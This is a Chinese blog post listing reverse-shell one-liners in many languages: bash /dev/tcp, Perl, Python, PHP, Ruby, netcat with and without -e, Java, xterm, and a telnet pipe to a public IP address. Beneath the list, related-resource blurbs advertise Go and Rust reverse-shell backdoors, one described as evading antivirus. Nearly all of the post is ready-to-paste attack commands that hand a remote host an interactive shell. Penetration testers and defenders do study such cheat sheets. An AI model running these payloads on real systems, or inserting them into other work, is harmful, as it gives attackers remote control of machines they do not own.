`
to8to-bruce
  • 浏览: 7140 次
社区版块
存档分类
最新评论

各种语言反弹shell

 
阅读更多
Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1


PERL
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



Python
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


PHP
This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Netcat
Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.0.0.1 1234


没有-e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f


Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()




xterm
One of the simplest forms of reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).  One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip




telnet
telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888
分享到:
评论

相关推荐

    go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒

    go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本

    hershell - Go语言反弹Shell后门.zip

    本案例中,我们关注的是一个名为“hershell”的Go语言编写的反弹Shell后门程序。Go语言,也被称为Golang,是Google开发的一种静态类型的、编译型的、垃圾回收的、并发型且具有C-like语法的编程语言,因其高效性和跨...

    反弹shell资源:Rust实现的简单反弹Shell例子

    本资源提供了用Rust编程语言实现的简单反弹Shell的例子。 Rust是一种系统级编程语言,以其内存安全和高性能而著名,它被广泛用于开发网络服务器、操作系统、游戏引擎等。使用Rust来实现反弹Shell,可以确保代码的...

    lonely-shell - Go语言实现的反弹Shell后门.zip

    《深入解析Go语言实现的反弹Shell后门:lonely-shell》 在网络安全领域,反弹Shell是一种常见的攻击手段,它允许攻击者在目标系统上获得一个持久的远程控制通道。Go语言,以其高效、跨平台的特性,近年来在系统级...

    linux-ReverseShellasaService反弹shell即服务

    4. **脚本语言**:Python、Perl、Bash等脚本语言常被用于创建反弹shell,因为它们灵活且易于编写。 5. **Payload生成**:攻击者可能需要生成特定的shellcode或利用,以在目标系统上创建反弹shell。这可能涉及到对二...

    反弹shell1

    反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...

    Linux下NC反弹shell命令(推荐)

    本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...

    python模拟菜刀反弹shell绕过限制【推荐】

    有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET...

    Platypus:用go编写的现代多重反向shell会话管理器

    反向外壳程序即服务(以多种语言弹出反向外壳程序,而无需记住空闲命令) 带进度条的下载/上传文件 全交互式外壳 在反向Shell中优雅地使用vim 在反向外壳中使用CTRL + C和CTRL + Z 自动启动服务器 从配置文件初始化 ...

    awesome-HUST-CS-CV-main (4).zip

    在【标签】中提到的"C"语言,是计算机编程的基础语言之一,它在系统级编程、嵌入式开发以及各种软件工程中都有广泛的应用。C语言以其高效、灵活和直接操作内存的特性,常被用来编写安全工具,包括网络扫描、漏洞利用...

    php-reverse-shell

    PHP反向Shell,也被称为PHP反弹Shell,是一种常见的渗透测试工具,主要用于在Web应用程序中获取远程服务器的命令执行权限。它的工作原理是利用PHP语言的特性,创建一个Web页面,当该页面被访问时,会连接到攻击者的...

    BlueShell:红蓝对抗跨平台远控工具

    蓝壳 BlueShell是一个Go语言编写的持续远程控制工具,拿下靶机后...交互式Shell反弹,Linux支持Tab补全,VIM,Ctrl + C等交互操作,Windows只支持普通反弹Shell 袜子5代理反弹 文件上传,下载 TLS通信加密 项目地址:

    网络注入教材

    8. **webshell下用NC反弹shell**:利用webshell(网站后门)配合网络命令工具netcat(NC)进行反弹shell,实现远程控制,这是攻击者常采用的远程操控手段。 9. **注射入侵全攻略**:综合性的入侵指南,可能涵盖了从...

    记一次phpmailer漏洞+UDF提权.pdf

    我们还使用了python语言来编写POC,实现了反弹shell登陆MySQL数据库。 在攻击结束后,我们总结了攻击过程,并对攻击机器进行了配置。我们使用了Kali Linux操作系统,并配置了靶机IP和字典来爆破密码。 在整个渗透...

    内网渗透流程与思路和工具讲解

    例如fscan是一款用go语言编写的开源内网综合扫描工具,支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控...

    AWD比赛各类必备脚本

    6. **反弹Shell**:通过控制受害主机向攻击者的服务器建立连接,实现远程控制。这需要理解TCP/IP协议栈,熟悉如何构造反向连接payload。 7. **后台flag读取**:在AWD比赛中,"flag"通常代表关键信息,需要在不被...

    网络安全工程视频.zip

    第1天-操作系统_名词_文件下载_反弹SHELL 第2天:Web应用_架构搭建_HTTP数据包_代理服务器 第3天:抓包_封包_协议_APP_小程序_PC应用_WEB应用 第4天:30余种加密编码进制_Web_数据库_系统_代码_参数值 第5天:资产...

    SQL注入器

    5. 反弹Shell:在某些情况下,攻击者可以通过SQL注入获取服务器的控制权,反弹一个Shell到攻击者的机器上。 使用SQL注入器时,需要注意合法性和道德性。这些工具应该仅用于合法的安全审计和漏洞检测,而不是非法...

    AutoXploit:基于metasploit的快速利用

    用户可以使用msfvenom生成不同平台和类型的payload,例如Windows、Linux或者Android,同时还可以设置反向连接、反弹shell等选项。 "ubuntu-scripts"标签可能意味着AutoXploit在Ubuntu操作系统上运行良好,或者包含...

Global site tag (gtag.js) - Google Analytics